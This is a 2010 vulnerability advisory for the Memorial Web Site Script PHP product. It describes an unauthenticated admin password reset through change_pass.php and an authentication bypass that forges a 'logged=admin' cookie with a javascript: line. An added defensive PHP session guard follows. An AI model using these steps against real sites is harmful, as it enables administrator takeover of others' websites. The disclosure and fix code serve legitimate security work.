# Title : Memorial Web Site Script --> Reset Password & Insecure Cookie Handling
# Published : 2010-04-23
# Author : Chip D3 Bi0s
-----------------------------------------------------------------------
Memorial Web Site Script --> Reset Password & Insecure Cookie Handling
-----------------------------------------------------------------------
Author : Chip D3 Bi0s
Email : chipdebios[alt+64]gmail.com
Where : From Remote
Group : LatinHackTeam
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Memorial Web Site Script
Author : Easy Scripts
Price : $49
Vendor : http://www.easy-scripts.net
Bug description:
~~~~~~~~~~~~~~~
To reset the password, just request this URL:
http://127.0.0.1/[path]/admin/change_pass.php
The password is then null, so you can log in as admin with the user name alone:
http://127.0.0.1/[path]/admin/
--------------------------
Insecure Cookie Handling
exploit:
javascript:document.cookie="logged=admin;path=/";
http://127.0.0.1/[path]/admin/
--------------------------
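Added example (not from the original advisory, and not the vendor's code): a server-side session guard for the admin pages that addresses both issues above. Login state is kept in the session instead of a client-set "logged" cookie, and change_pass.php only acts on an authenticated POST that carries the current password. The file name, function names, the 12-character minimum and HTTPS are assumptions.

```php
<?php
// Hypothetical admin/auth_guard.php, included first by every admin page,
// change_pass.php included. All names here are assumptions (PHP >= 7.4).
//
// Weak pattern the advisory implies: trusting a value the browser sets.
//   if ($_COOKIE['logged'] === 'admin') { /* show admin panel */ }

session_set_cookie_params([
    'path'     => '/',
    'secure'   => true,       // assumes the site is served over HTTPS
    'httponly' => true,
    'samesite' => 'Strict',
]);
session_start();

// Call once, after the login form's password check has succeeded.
function mark_logged_in(string $user): void
{
    session_regenerate_id(true);                    // blocks session fixation
    $_SESSION['user'] = $user;                      // login state stays server-side
    $_SESSION['csrf'] = bin2hex(random_bytes(32));  // per-session form token
}

// Call at the top of every admin page before any output.
function require_admin(): void
{
    if (($_SESSION['user'] ?? null) !== 'admin') {
        http_response_code(403);
        exit('Forbidden');
    }
}

// For change_pass.php: returns the new hash to store, or null to reject.
// A bare GET, a missing token, or an empty new password changes nothing.
function change_password(string $storedHash, array $post): ?string
{
    require_admin();
    $f = fn(string $k): string => is_string($post[$k] ?? null) ? $post[$k] : '';
    $csrf = $_SESSION['csrf'] ?? '';
    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST'
        || $csrf === '' || !hash_equals($csrf, $f('csrf'))
        || !password_verify($f('current'), $storedHash)
        || strlen($f('new')) < 12) {
        return null;
    }
    return password_hash($f('new'), PASSWORD_DEFAULT);
}
```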
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++